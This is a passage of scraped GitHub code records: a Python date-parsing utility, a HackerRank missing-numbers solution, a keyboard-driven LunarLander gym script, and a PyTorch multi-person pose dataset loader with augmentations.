re.sub(\"mois\", CustomDateTime._get_month(current_time), d_format, 
flags=re.I)\n d_format = re.sub(r\"m\\.\", CustomDateTime._get_month(current_time, abr=True), d_format, flags=re.I)\n\n last_car_is_percent = False\n final_format = \"\"\n\n # one\n for car in re.split(\"(? datetime.datetime:\n if isinstance(date_value, CustomDateTime):\n return date_value._source\n if isinstance(date_value, (datetime.datetime, datetime.date)):\n return datetime.datetime.fromisoformat(date_value.isoformat())\n if isinstance(format_, str):\n format_ = [format_]\n if isinstance(format_, (list, tuple)):\n for ff in format_:\n try:\n if \"%\" not in ff:\n ff, _ = CustomDateTime._parse_format(ff)\n return datetime.datetime.strptime(str(date_value), ff)\n except (ValueError, Exception):\n pass\n if ignore_errors:\n return CustomDateTime(default)()\n raise ValueError(\"Given arg (%s) doesn't match any format given: %s\" % (date_value, format_))\n now = datetime.datetime.now()\n\n args = {k: kwargs.get(k, getattr(now, k))\n for k in [\"year\", \"month\", \"day\", \"hour\", \"minute\", \"second\",\n \"microsecond\"]}\n now = datetime.datetime(**args)\n\n if date_value == \"now\" or date_value is None:\n date_value = now\n elif isinstance(date_value, str):\n\n if len(date_value) < 6 or re.search(r\"\\d{9,}\", date_value) or not re.search(r'\\d{2}', date_value):\n if ignore_errors:\n return CustomDateTime(default)()\n raise ValueError(\"Bad value given for argument date_value: \" + date_value)\n\n d_format = kwargs.get(\"d_format\")\n equivalent_str_parse_time = {\n \"%Y\": r\"(\\d{4})\", \"%y\": r\"(\\d{2})\",\n \"%m\": r\"(\\d{2})\",\n \"%d\": r\"(\\d{1,2})\"\n }\n year, month, day = [None] * 3\n dhour, dminute, dsecond, dmicro = [0] * 4\n if d_format is not None:\n if isinstance(d_format, str):\n d_format = [d_format]\n got = False\n for ff in d_format:\n orign_ff = ff\n if \"%\" not in ff:\n ff, time_ = CustomDateTime._parse_format(ff)\n temp = ff\n for k, v in equivalent_str_parse_time.items():\n temp = temp.replace(k, v)\n for car in \"AaBb\":\n temp = temp.replace(\"%\" + car, r\"(\\w+)\")\n for car in \"wWjU\":\n temp = temp.replace(\"%\" + car, r\"(\\d+)\")\n res = re.search(\"(\" + temp + \")\", date_value)\n if res:\n if \"%\" in orign_ff:\n try:\n temp = datetime.datetime.strptime(res.groups()[0], orign_ff)\n year, month, day = temp.year, temp.month, temp.day\n got = True\n break\n except (ValueError, Exception):\n pass\n else:\n args = {k: v for k, v in zip(re.findall(r\"%([Yymd])\", ff), res.groups()[1:])}\n if \"y\" in args and \"Y\" not in args:\n # make some transformation here\n args[\"Y\"] = args[\"y\"]\n year, month, day = args.get(\"Y\", str(now.year)), args.get(\"m\", \"01\"), args.get(\"d\", \"01\")\n if len(year) == 2:\n if \"20\" + year <= str(datetime.datetime.now().year):\n year = \"20\" + year\n else:\n year = \"19\" + year\n try:\n temp = datetime.date(int(year), int(month), int(day))\n year, month, day = temp.year, temp.month, temp.day\n got = True\n break\n except (ValueError, Exception):\n pass\n\n if not got:\n if ignore_errors:\n return CustomDateTime(default)()\n raise ValueError(\"Bad value given for argument date_value: %s for formats: %s\" %\n (date_value, d_format))\n if year is None:\n\n date_value = date_value.strip()\n reg = (r'^(\\d{4})[_/-]?(\\d{1,2})[_/-]?(\\d{1,2})(?:[A-Z ]?'\n r'(\\d{1,2})[:_](\\d{1,2})(?:[:_](\\d{1,2})(?:\\.(\\d+))?)?[A-Z]?)?$'\n )\n res = re.search(reg, date_value)\n\n if res:\n got = True\n year, month, day, hour, minute, second, micro = res.groups()\n if int(month) not in range(1, 13):\n got = False\n elif int(year) 
< 1900:\n got = False\n elif int(day) > 31:\n got = False\n if got:\n try:\n return datetime.datetime(year=int(year),\n month=int(month),\n day=int(day),\n hour=int(hour or 0),\n minute=int(minute or 0),\n second=int(second or 0),\n microsecond=int(micro or 0) * 1000\n )\n except ValueError:\n pass\n # try to extract the date from string\n reg_1 = r'\\s(\\d{1,2})[_/-]?(\\d{1,2})[_/-]?(\\d{4})\\s'\n reg_0 = r'\\s(\\d{4})[_/-]?(\\d{1,2})[_/-]?(\\d{1,2})\\s'\n dyear, dmonth, dday, dhour, dminute, dsecond, dmicro = (\n now.year, 1, 1, 0, 0, 0, 0)\n got = False\n\n year, month, day = dyear, dmonth, dday\n if re.search(reg_1, f\" {date_value} \"):\n year, month, day = re.search(reg_1,\n f\" {date_value} \").groups()[::-1]\n if int(month) in range(1, 13) and int(day) <= 31:\n got = True\n if not got and re.search(reg_0, f\" {date_value} \"):\n year, month, day = re.search(reg_0, f\" {date_value} \").groups()\n if int(month) in range(1, 13) and int(day) <= 31:\n got = True\n if not got:\n month_ref = {}\n v = \"\"\n for key, value in CustomDateTime.MONTH.items():\n value = value[\"value\"]\n for s in value:\n v += s + \"|\"\n month_ref[s] = key\n v = v[:-1]\n reg = r\"\\s(?:(\\d{1,2})[\\s-]+)?(%s)[\\s-]+(?:(\\d{2}|\\d{4})\\s)?\" % v\n if re.search(reg, f\" {date_value} \", flags=re.I):\n day, month, year = re.search(reg,\n f\" {date_value} \",\n flags=re.I).groups()\n year = year or str(now.year)\n if len(year) == 2:\n if \"20\" + year <= str(datetime.datetime.now().year):\n year = \"20\" + year\n else:\n year = \"19\" + year\n month = month_ref[month.lower()]\n got = True\n try:\n assert got, f\"Date Parsing fail: format not supported ->\" \\\n f\" {repr(date_value)}\"\n except AssertionError:\n if ignore_errors:\n default = CustomDateTime._parse(default)\n day, month, year = default.day, default.month, default.year\n else:\n raise ValueError(f\"Date Parsing fail: format not supported ->\"\n f\" {repr(date_value)}\")\n # try to extract hour\n reg_hour = r\"\\s(\\d{1,2})[:_](\\d{1,2})(?:[:_](\\d{1,2})(?:\\.(\\d+))?)?(?:\\s+(am|pm))?\\s\"\n hour, minute, second, micro = 0, 0, 0, 0\n reg_hour = re.search(reg_hour, f\" {date_value} \", flags=re.I)\n if reg_hour:\n hour, minute, second, micro, am_pm = reg_hour.groups()\n hour = int(hour)\n am_pm = str(am_pm).strip().lower()\n if am_pm == \"am\" and hour >= 12:\n hour = hour - 12\n elif am_pm == \"pm\" and hour < 12:\n hour = hour + 12\n try:\n date_value = datetime.datetime(year=int(year),\n month=int(month),\n day=int(day),\n hour=int(hour or dhour),\n minute=int(minute or dminute),\n second=int(second or dsecond),\n microsecond=int(micro or\n dmicro) * 1000\n )\n except ValueError as ex:\n ex.args = [\"Got bad value of date_value: %s. 
\"\n \"After parsing got year=%s, month=%s day=%s\" % (date_value, year, month, day)]\n raise ex\n return date_value\n\n # Ok\n def to_string(self, d_format=None, sep=None, microsecond=False, force_time=False,\n t=True, intelligent=False, approximative=True):\n if not force_time and t:\n t = (self._source.hour or self._source.minute\n or self._source.second or self._source.microsecond)\n return self.datetime_as_string(self._source, sep=sep,\n microsecond=microsecond, time_=t,\n d_format=d_format, intelligent=intelligent,\n approximative=approximative)\n\n def get_month(self):\n last_month = CustomDateTime(str(self.to_string(\"y-m\") + \"-01\")) - 1\n return type(\"CustomMonth\", (), {\"end\": lambda: last_month, \"nb_day\": int(last_month.to_string(\"dd\"))})\n\n # Ok\n @staticmethod\n def datetime_as_string(\n date_time: str | datetime.datetime | datetime.date = \"now\",\n sep=None, microsecond=False,\n time_=True, d_format=None,\n intelligent=False, approximative=True):\n \"\"\"\n Use to get datetime formatting to str\n Args:\n date_time: datetime value\n sep: str\n microsecond: bool, consider microsecond?\n time_: show time\n d_format: str\n intelligent: bool\n approximative: bool\n\n Returns:\n str, the datetime str formatted\n\n \"\"\"\n\n current_time = CustomDateTime._parse(date_time)\n now = CustomDateTime()\n _months = [i for i in CustomDateTime.range_date(current_time.date(), now.date, freq=\"m\")]\n if now() >= current_time:\n _months = _months[1:]\n if intelligent and len(_months) <= 12:\n if CustomDateTime.DEFAULT_LANG == \"fr\":\n t = \" à \" if time_ else \"\"\n _msg_start = \"Il y a \" if now() >= current_time else \"Dans \"\n _msg_end = \"\"\n hier_text = \"Hier\" + t if now() >= current_time else \"Demain\" + t\n print(hier_text, current_time, now(), now() >= current_time)\n else:\n _msg_start = \"\" if now() >= current_time else \"In \"\n _msg_end = \"ago\" if now() >= current_time else \"\"\n hier_text = \"Yesterday \" if now() >= current_time else \"Tomorrow \"\n\n if now.date == current_time.date():\n if time_:\n dts = abs(int((now() - current_time).total_seconds()))\n _h = int(dts // (60 * 60))\n if _h > 0:\n return _msg_start + str(_h) + \" h\" + \" \" + _msg_end\n _m = int(dts // 60)\n if _m > 0:\n return _msg_start + str(_m) + \"m \" + _msg_end\n return _msg_start + str(dts) + \"s \" + _msg_end\n else:\n return \"Ce jour\" if CustomDateTime.DEFAULT_LANG == \"fr\" else \"This day\"\n elif (now.date == CustomDateTime.from_calculation(current_time, \"+1 day\").date or\n now.date == CustomDateTime.from_calculation(current_time, \"-1 day\").date):\n return hier_text + \\\n current_time.strftime(\"%H:%M\" if time_ else \"\")\n elif not len(_months) and CustomDateTime.DEFAULT_LANG == \"fr\":\n return f\"Le {current_time.date().day:0>2}\" + current_time.strftime(\" à %H:%M\" if time_ else \"\")\n elif abs((now.date - current_time.date()).days) < 30:\n s = \"s\" if (now.date - current_time.date()).days > 1 else \"\"\n _jour = (\" jour%s\" % s) if CustomDateTime.DEFAULT_LANG == \"fr\" else (\" day%s \" % s)\n return _msg_start + str(abs((now.date - current_time.date()).days)) + _jour + _msg_end\n elif approximative:\n s = \"s\" if len(_months) > 1 else \"\"\n _mois = (\" mois\" if CustomDateTime.DEFAULT_LANG == \"fr\" else \" month%s \" % s)\n return _msg_start + str(len(_months)) + _mois + _msg_end\n else:\n return CustomDateTime.datetime_as_string(current_time, d_format=\"day month\") + \\\n current_time.strftime(\"%H:%M\" if time_ else \"\")\n elif intelligent and now() 
>= current_time and now.date.year > current_time.date().year:\n if CustomDateTime.DEFAULT_LANG == \"fr\":\n return \"Il y a longtemps\" if now() >= current_time else \"Dans un futur lointain\"\n return \"A long time ago\" if now() >= current_time else \"In a long time\"\n\n if isinstance(d_format, str):\n if \"%\" in d_format:\n try:\n res = current_time.strftime(d_format)\n assert res != d_format\n return res\n except (ValueError, AssertionError):\n pass\n d_format, time_ = CustomDateTime._parse_format(d_format, current_time)\n if \"-\" in d_format:\n sep = \"-\"\n elif \"/\" in d_format:\n sep = \"/\"\n else:\n d_format = \"%Y{sep}%m{sep}%d\"\n if sep is None:\n sep = \"-\"\n\n if str(d_format).lower() == \"normal\":\n date_time = CustomDateTime.WEEKDAYS[current_time.weekday()] + \" \" + \\\n f\"{current_time.day:0>2} \" + \\\n CustomDateTime.MONTH[current_time.month][\"value\"][0] + \" \" + \\\n str(current_time.year)\n\n else:\n d_format = CustomDateTime.SUPPORTED_FORMAT.get(\n d_format, d_format).format(sep=sep)\n date_time = current_time.strftime(d_format + (f\" %H:%M:%S\" if time_ else \"\"))\n\n if not microsecond:\n current_time.replace(microsecond=0)\n ms = current_time.microsecond\n return date_time + (f\":{str(ms)[:3]:0>3}\" if microsecond and time_ else \"\")\n\n # Ok\n @classmethod\n def from_calculation(cls,\n date_time: str | datetime.datetime | datetime.date | CustomDateTime = \"now\",\n minus_or_add: str | int | float = None, **kwargs):\n \"\"\"\n use to generate new date from the passing arg date_time by applying some added day, month, year,\n second, minutes, weeks\n Args:\n date_time: (str, datetime.datetime | datetime.date | CustomDateTime), the init date\n minus_or_add: (str, int, float):\n when : str\n it's needed to specify what we want to add. 
Example\n >> minus_or_add = \"1 day -1month 3 years\"; date_time=\"2023-01-01\"\n (Result) 2025-12-02 00:00:00\n when : int\n this is equivalent to f'{minus_or_add} days'\n when : float\n Equivalent to f'{minus_or_add} seconds'\n \"\"\"\n\n date_time = cls._parse(date_time, **kwargs)\n if isinstance(minus_or_add, int):\n minus_or_add = str(minus_or_add) + \" day\"\n elif isinstance(minus_or_add, float):\n sign = 1 if minus_or_add >= 0 else -1\n sec, micro = str(abs(minus_or_add)).split(\".\")\n micro = int(micro) * 1000\n minus_or_add = f\"{sign * sec}secs {sign * micro}microseconds\"\n\n if isinstance(minus_or_add, str):\n values = re.findall(\n r\"([-+])?\\s*(\\d+)\\s*(days?|months?|years?|\"\n r\"weeks?|hours?|mins?|minutes?|secs?|seconds?|\"\n r\"microsecs?|microseconds?)\",\n minus_or_add)\n assert len(values), f\"Bad value given: '{minus_or_add}'\"\n keys = [\n \"weeks\",\n \"days\",\n \"hours\",\n \"minutes\",\n \"seconds\",\n \"microseconds\",\n \"years\",\n \"months\",\n ]\n args = {key: 0 for key in keys}\n match = {k[:-1]: k for k in keys}\n match.update({\"min\": \"minutes\", \"sec\": \"seconds\", \"microsec\": \"microseconds\"})\n for arg in values:\n op, value, item = arg\n if op is None:\n op = \"\"\n if item.endswith(\"s\"):\n item = item[:-1]\n item = match[item]\n args[item] = int(op + value)\n years = args.pop(\"years\")\n months = args.pop(\"months\")\n\n delta = datetime.timedelta(**args)\n\n date_time = date_time + delta\n\n try:\n while True:\n if date_time.month + months > 12 or date_time.month + months <= 0:\n years += 1 if months > 0 else -1\n months += -12 if months > 0 else 12\n else:\n break\n date_time = date_time.replace(month=date_time.month + months, year=date_time.year + years)\n except ValueError:\n # assert date_time.month + months == 2, \"An unknown error occurred\"\n date_time = date_time.replace(\n month=date_time.month + months + 1,\n year=date_time.year + years,\n day=1) + datetime.timedelta(days=-1)\n\n return cls(date_time)\n\n\nif __name__ == '__main__':\n print(CustomDateTime.datetime_as_string(\"now\", d_format=\"y--md\"))\n print(CustomDateTime(\"202301-01 2:10:10\", d_format=\"%Y%m-%d\"))\n","repo_name":"boris-kanga/kb_package","sub_path":"kb_package/utils/custom_datetime.py","file_name":"custom_datetime.py","file_ext":"py","file_size_in_byte":30495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32495156432","text":"n_len = int(input())\r\nn = [int(n_temp) for n_temp in input().strip().split(' ')]\r\nm_len = int(input())\r\nm = [int(m_temp) for m_temp in input().strip().split(' ')]\r\ncounts = [0] * 201\r\npivot = n[0]\r\nfor i in range(n_len):\r\n counts[100+n[i]-pivot] += 1\r\nfor i in range(m_len):\r\n counts[100+m[i]-pivot] -= 1\r\n#print (counts) \r\nfor i in range(len(counts)):\r\n if counts[i] != 0:\r\n print (i-100+pivot, end=' ')","repo_name":"gauthamkrishna-g/HackerRank","sub_path":"Algorithms/Search/Missing_Numbers.py","file_name":"Missing_Numbers.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"899922899","text":"# python-sudo.sh\n\nimport sys, gym, time\nfrom pynput.keyboard import Listener\nimport keyboard\n\n#\n# Action space Size:2 | (Main Engine, Side Engines):= ( [-1, 1], [-1, 1])\n#\n\nenv = gym.make('LunarLanderContinuous-v2' if len(sys.argv) < 2 else sys.argv[1])\n\nACTIONS = env.action_space.shape\nSKIP_CONTROL = 0 # Use previous control decision 
SKIP_CONTROL times, that's how you\n# can test what skip is still usable.\n\nhuman_agent_action = 0\nsac_agent_action = 0\nhuman_wants_restart = False\nhuman_sets_pause = False\n\nstate_dim = env.observation_space.shape[0]\naction_dim = env.action_space.shape[0]\naction_bound = env.action_space.high\nprint(\"State dim: \" + str(state_dim))\nprint(\"Action Dim: \" + str(action_dim))\nprint(\"Reward Threshold: \" + str(env.spec.reward_threshold))\nprint(\"Action Bound: \" + str(action_bound))\n\na = 0\n\n\ndef key_press(key, mod):\n global human_agent_action, human_wants_restart, human_sets_pause, sac_agent_action\n if key == 0xff0d: human_wants_restart = True\n if key == 32: human_sets_pause = not human_sets_pause\n # a = int(key - ord('0'))\n # if a <= 0 or a > 4: return\n if key not in [ord(\"w\"), ord(\"s\"), ord(\"a\"), ord(\"d\")]: return\n if key == ord(\"w\"):\n # print(\"pressed w\")\n human_agent_action = 1\n if key == ord(\"s\"):\n # print(\"pressed s\")\n human_agent_action = -1\n if key == ord(\"a\"):\n # print(\"pressed a\")\n sac_agent_action = -1\n if key == ord(\"d\"):\n # print(\"pressed d\")\n sac_agent_action = 1\n\n\ndef key_release(key, mod):\n global human_agent_action, sac_agent_action\n if key not in [ord(\"w\"), ord(\"s\"), ord(\"a\"), ord(\"d\")]: return\n\n if key == ord(\"w\"):\n # print(\"released w\")\n human_agent_action = 0\n if key == ord(\"s\"):\n # print(\"released s\")\n human_agent_action = 0\n if key == ord(\"a\"):\n # print(\"released a\")\n sac_agent_action = 0\n if key == ord(\"d\"):\n # print(\"released d\")\n sac_agent_action = 0\n\n\nenv.render()\nenv.unwrapped.viewer.window.on_key_press = key_press\nenv.unwrapped.viewer.window.on_key_release = key_release\n\n\ndef rollout(env):\n global human_agent_action, human_wants_restart, human_sets_pause\n human_wants_restart = False\n obser = env.reset()\n skip = 0\n total_reward = 0\n total_timesteps = 0\n a_x, a_y = [0, 0]\n while 1:\n if not skip:\n a_x, a_y = [human_agent_action, sac_agent_action]\n total_timesteps += 1\n skip = SKIP_CONTROL\n else:\n skip -= 1\n\n obser, r, done, info = env.step([a_x, a_y])\n # if r != 0:\n # print(\"reward %0.3f\" % r)\n total_reward += r\n window_still_open = env.render()\n if window_still_open == False: return False\n if done: break\n if human_wants_restart: break\n while human_sets_pause:\n env.render()\n time.sleep(0.1)\n time.sleep(0.1)\n print(\"timesteps %i reward %0.2f\" % (total_timesteps, total_reward))\n\n\nprint(\"ACTIONS={}\".format(ACTIONS))\nprint(\"Press keys 1 2 3 ... 
to take actions 1 2 3 ...\")\nprint(\"No keys pressed is taking action 0\")\n\nwhile 1:\n window_still_open = rollout(env)\n if window_still_open == False: break\n","repo_name":"ligerfotis/HumanAgentLunar","sub_path":"keyboard_env_continuous.py","file_name":"keyboard_env_continuous.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71723114496","text":"import copy\nimport json\nimport math\nimport numpy as np\nimport random\nimport torch\nfrom torch.nn.utils.rnn import pad_sequence\n\nfrom utils.utils import path_to_data\nfrom utils.data import load_data_3dpw_multiperson, load_data_somof\nfrom torchvision import transforms\n\ndef collate_batch(batch):\n joints_list = []\n masks_list = []\n num_people_list = []\n for joints, masks in batch:\n # Make sure first dimension is # people for single person case\n if len(joints.shape) == 3:\n joints = joints.unsqueeze(0)\n masks = masks.unsqueeze(0)\n\n joints_list.append(joints)\n masks_list.append(masks)\n num_people_list.append(torch.zeros(joints.shape[0]))\n\n joints = pad_sequence(joints_list, batch_first=True)\n masks = pad_sequence(masks_list, batch_first=True)\n padding_mask = pad_sequence(num_people_list, batch_first=True, padding_value=1).bool()\n\n return joints, masks, padding_mask\n\n\ndef batch_process_joints(joints, masks, padding_mask, config,training=False, multiperson=True):\n joints = joints.to(config[\"DEVICE\"])\n masks = masks.to(config[\"DEVICE\"])\n \n if multiperson and len(joints.shape) == 4:\n joints = joints.unsqueeze(1)\n masks = masks.unsqueeze(1)\n\n in_F = config[\"TRAIN\"][\"input_track_size\"]\n\n if multiperson:\n if config[\"DATA\"][\"joints\"] == \"somof\" or config['DATA']['joints'] == 'posetrack':\n in_joints_pelvis = joints[:,:, (in_F-1):in_F, 6:7, :].clone()\n elif config[\"DATA\"][\"joints\"] == \"cmu\":\n in_joints_pelvis = joints[:,:, (in_F-1):in_F , 12:13 ,:].clone()\n else:\n if config[\"DATA\"][\"joints\"] == \"somof\" or config['DATA']['joints'] == 'posetrack':\n in_joints_pelvis = joints[:, (in_F-1):in_F , 6:7 ,:].clone()\n else:\n in_joints_pelvis = torch.zeros_like(in_joints_pelvis)\n \n joints -= in_joints_pelvis\n\n if multiperson:\n B, N, F, J, K = joints.shape\n joints = joints.transpose(1, 2).reshape(B, F, N*J, K)\n in_joints_pelvis = in_joints_pelvis.reshape(B, 1, N, K)\n masks = masks.transpose(1, 2).reshape(B, F, N*J)\n\n # If training, can do augmentations\n if training:\n if config[\"DATA\"][\"aug_rotate\"]:\n joints = getRandomRotatePoseTransform(config)(joints)\n if config[\"DATA\"][\"aug_scale\"]:\n joints = getRandomScaleTransform()(joints)\n if \"aug_permute\" in config[\"DATA\"] and config[\"DATA\"][\"aug_permute\"]:\n joints, masks, padding_mask = getRandomPermuteOrder(joints, masks, padding_mask)\n \n\n in_F, out_F = config[\"TRAIN\"][\"input_track_size\"], config[\"TRAIN\"][\"output_track_size\"] \n in_joints = joints[:,:in_F].float()\n out_joints = joints[:,in_F:in_F+out_F].float()\n in_masks = masks[:,:in_F].float()\n out_masks = masks[:,in_F:in_F+out_F].float()\n\n return in_joints, in_masks, out_joints, out_masks, in_joints_pelvis.float(), padding_mask.float()\n\n\n\n\ndef getRandomScaleTransform(r1=0.8, r2=1.2):\n def do_scale(x):\n #scale = (r1 - r2) * torch.rand(1) + r2\n scale = (r1 - r2) * torch.rand(x.shape[0]).reshape(-1, 1, 1, 1) + r2\n return x * scale.to(x.device)\n return transforms.Lambda(lambda x: do_scale(x))\n\n\ndef getRandomPermuteOrder(joints, masks, 
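`collate_batch` relies on `pad_sequence` to equalize the number of people per scene and encodes absent (padded) people with a 1 in `padding_mask`. A small shape check of that scheme, assuming PyTorch is installed; the tensor sizes are invented for the demo:

import torch
from torch.nn.utils.rnn import pad_sequence

two_people = torch.zeros(2, 5, 13, 3)   # (people, frames, joints, xyz)
one_person = torch.zeros(1, 5, 13, 3)
joints = pad_sequence([two_people, one_person], batch_first=True)
print(joints.shape)                     # torch.Size([2, 2, 5, 13, 3])

# padding_mask marks the padded (absent) people with True, as above.
counts = [torch.zeros(2), torch.zeros(1)]
padding_mask = pad_sequence(counts, batch_first=True, padding_value=1).bool()
print(padding_mask)                     # tensor([[False, False], [False,  True]])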
padding_mask):\n \"\"\"\n Randomly permutes persons across the input token dimension. This helps\n expose all learned embeddings to a variety of poses.\n \"\"\"\n \n def do_permute(joints, masks, padding_mask):\n B, N = padding_mask.shape\n B, F, NJ, K = joints.shape\n J = NJ // N\n \n perm = torch.argsort(torch.rand(B, N), dim=-1).reshape(B, N)\n idx = torch.arange(B).unsqueeze(-1)\n \n joints = joints.view(B, F, N, J, K).transpose(1, 2)[idx, perm]\n joints = joints.transpose(1, 2).reshape(B, F, N*J, K)\n \n masks = masks.view(B, F, N, J).transpose(1, 2)[idx,perm]\n masks = masks.transpose(1, 2).reshape(B, F, N*J)\n \n padding_mask = padding_mask[idx, perm]\n \n return joints, masks, padding_mask\n\n return do_permute(joints, masks, padding_mask)\n\n\ndef getRandomRotatePoseTransform(config):\n \"\"\"\n Performs a random rotation about the origin (0, 0, 0)\n \"\"\"\n\n def do_rotate(pose_seq):\n \"\"\"\n pose_seq: torch.Tensor of size (B, S, J, 3) where S is sequence length, J is number \n of joints, and the last dimension is the coordinate\n \"\"\"\n B, F, J, K = pose_seq.shape\n\n angles = torch.deg2rad(torch.rand(B)*360)\n\n rotation_matrix = torch.zeros(B, 3, 3).to(pose_seq.device)\n rotation_matrix[:,1,1] = 1\n rotation_matrix[:,0,0] = torch.cos(angles)\n rotation_matrix[:,0,2] = torch.sin(angles)\n rotation_matrix[:,2,0] = -torch.sin(angles)\n rotation_matrix[:,2,2] = torch.cos(angles)\n\n rot_pose = torch.bmm(pose_seq.reshape(B, -1, 3).float(), rotation_matrix)\n rot_pose = rot_pose.reshape(pose_seq.shape)\n return rot_pose\n\n return transforms.Lambda(lambda x: do_rotate(x))\n\n\nclass MultiPersonPoseDataset(torch.utils.data.Dataset):\n SOMOF_JOINTS = [1, 2, 4, 5, 7, 8, 12, 16, 17, 18, 19, 20, 21]\n COCO_TO_SOMOF = [6, 12, 7, 13, 8, 14, 0, 3, 9, 4, 10, 5, 11]\n\n\n def __init__(self, name, split=\"train\", track_size=30, track_cutoff=16, segmented=True,\n add_flips=False, frequency=1):\n \"\"\"\n name: The name of the dataset (e.g. \"somof\")\n split: one of ['train', 'valid', 'test']\n add_flips: whether to add flipped sequences to data as well (data augmentation)\n mode: one of ['inference', 'eval'] In eval mode, will not do train data augmentation.\n frequency: How often to take a frame (i.e. distance between frames). 
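`do_rotate` builds a per-batch rotation about the vertical (y) axis and applies it with a batched matmul, so poses spin around the origin without changing joint distances. A quick numpy cross-check of that matrix layout (row vector times matrix, matching the `torch.bmm` call above):

import numpy as np

theta = np.deg2rad(90.0)
rot = np.array([[ np.cos(theta), 0.0, np.sin(theta)],
                [ 0.0,           1.0, 0.0          ],
                [-np.sin(theta), 0.0, np.cos(theta)]])
point = np.array([1.0, 2.0, 0.0])
rotated = point @ rot
print(np.round(rotated, 6))     # x and z swap, y is untouched
print(np.isclose(np.linalg.norm(point), np.linalg.norm(rotated)))  # True: norms preserved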
For example, if\n frequency=2, will take every other frame.\n \"\"\"\n self.name = name\n self.split = split\n self.track_size = track_size\n self.track_cutoff = track_cutoff\n self.segmented = segmented\n self.frequency = frequency\n self.add_flips = add_flips\n\n self.initialize()\n \n def load_data(self):\n raise NotImplementedError(\"Dataset load_data() method is not implemented.\")\n\n def initialize(self):\n self.load_data()\n\n if self.segmented:\n tracks = []\n for scene in self.datalist:\n for seg, j in enumerate(range(0, len(scene[0][0]) - self.track_size * self.frequency + 1, self.track_size)):\n people = []\n for person in scene:\n start_idx = j\n end_idx = start_idx + self.track_size * self.frequency\n J_3D_real, J_3D_mask = person[0][start_idx:end_idx:self.frequency], person[1][\n start_idx:end_idx:self.frequency]\n people.append((J_3D_real, J_3D_mask))\n tracks.append(people)\n self.datalist = tracks\n\n # If we're on a train split, do some additional data augmentation as well\n if self.add_flips:\n print(\"doing some flips for \" + self.name + \", \" + self.split + \" split\")\n # for each sequence, we can also add a \"flipped\" sequence\n flipped_datalist = []\n for seq in self.datalist:\n flipped_seq = []\n for J_3D_real, J_3D_mask in seq:\n J_3D_flipped = torch.flip(J_3D_real, dims=(0,)).clone()\n J_3D_mask_flipped = torch.flip(J_3D_mask, dims=(0,)).clone()\n flipped_seq.append((J_3D_flipped, J_3D_mask_flipped))\n flipped_datalist.append(flipped_seq)\n \n self.datalist += flipped_datalist\n\n if not self.segmented:\n # create a mapping from idx to which track/frame to look at\n # prevents extra computation at dataset time\n frame_count = 0\n self.track_map = []\n for i, scene in enumerate(self.datalist):\n track_frames = len(scene[0][0]) - self.track_size * self.frequency + 1\n for k in range(0, track_frames):\n self.track_map.append((i, k))\n frame_count += track_frames\n\n def __len__(self):\n if self.segmented:\n return len(self.datalist)\n else:\n return sum([len(scene[0][0]) - self.track_size * self.frequency + 1 for scene in self.datalist])\n\n def __getitem__(self, idx):\n if self.segmented:\n scene = self.datalist[idx]\n\n else:\n # We want to count the idx-th valid frame in our list of tracks\n # A valid frame is any frame that has at least (track_size-1)\n # frames ahead of it (i.e. 
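`initialize` slices each track into windows of `track_size * frequency` frames, either non-overlapping (segmented) or at every valid start frame via `track_map`. The start-index arithmetic in isolation; `window_starts` is an illustrative helper, not part of the class:

def window_starts(track_len, track_size, frequency, segmented):
    # A start index is valid when a full strided window still fits.
    n_valid = track_len - track_size * frequency + 1
    if segmented:
        return list(range(0, n_valid, track_size))  # non-overlapping segments
    return list(range(0, n_valid))                  # every valid start frame

print(window_starts(70, 30, 2, segmented=True))   # [0]
print(window_starts(70, 30, 2, segmented=False))  # [0, 1, ..., 10]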
it can be used as the start frame)\n track_idx, frame_idx = self.track_map[idx]\n\n scene = []\n for person in self.datalist[track_idx]:\n J_3D_real = person[0][\n frame_idx:frame_idx + self.track_size * self.frequency:self.frequency]\n J_3D_mask = person[1][\n frame_idx:frame_idx + self.track_size * self.frequency:self.frequency]\n scene.append((J_3D_real, J_3D_mask))\n\n J_3D_real = torch.stack([s[0] for s in scene])\n J_3D_mask = torch.stack([s[1] for s in scene])\n\n return J_3D_real, J_3D_mask\n\n\nclass SoMoFDataset(MultiPersonPoseDataset):\n SOMOF_JOINTS = [1, 2, 4, 5, 7, 8, 12, 16, 17, 18, 19, 20, 21]\n COCO_TO_SOMOF = [6, 12, 7, 13, 8, 14, 0, 3, 9, 4, 10, 5, 11]\n\n def __init__(self, **args):\n super(SoMoFDataset, self).__init__(\"somof\", frequency=1, **args)\n\n def load_data(self):\n data_in, data_out, _, _ = load_data_somof(split=self.split)\n\n data = np.concatenate((data_in, data_out), axis=2)\n data = torch.from_numpy(data)\n data = data.reshape((*data.shape[:-1], 13, 3)) # (N, 30, 2, 13, 3)\n\n self.num_kps = 13\n self.datalist = [[(person, torch.ones(person.shape[:-1])) for person in track] for track in data]\n\nclass ThreeDPWDataset(MultiPersonPoseDataset):\n def __init__(self, **args):\n super(ThreeDPWDataset, self).__init__(\"3dpw\", frequency=2, **args)\n\n def load_data(self):\n self.data = load_data_3dpw_multiperson(split=self.split)\n\n self.datalist = []\n for scene in self.data:\n people = [(torch.from_numpy(joints)[:,self.SOMOF_JOINTS],\n torch.from_numpy(mask)[:,self.SOMOF_JOINTS]) for joints, mask in scene]\n self.datalist.append(people)\n\n\ndef create_dataset(dataset_name, logger, **args):\n logger.info(\"Loading dataset \" + dataset_name)\n \n if dataset_name == \"3dpw\":\n dataset = ThreeDPWDataset(**args)\n elif dataset_name == \"somof\":\n dataset = SoMoFDataset(**args)\n else:\n raise ValueError(f\"Dataset with name '{dataset_name}' not found.\")\n \n logger.info(f\"Loaded {len(dataset)} annotations for \" + dataset_name)\n return dataset\n\n\ndef get_datasets(datasets_list, config, logger):\n \"\"\" \n Returns a list of torch dataset objects\n datasets_list: [String]\n \"\"\"\n in_F, out_F = config['TRAIN']['input_track_size'], config['TRAIN']['output_track_size']\n datasets = []\n for dataset_name in datasets_list:\n datasets.append(create_dataset(dataset_name, logger, split=\"train\", track_size=(in_F+out_F), track_cutoff=in_F, segmented=config['DATA']['segmented'], add_flips=config['DATA']['add_flips']))\n return 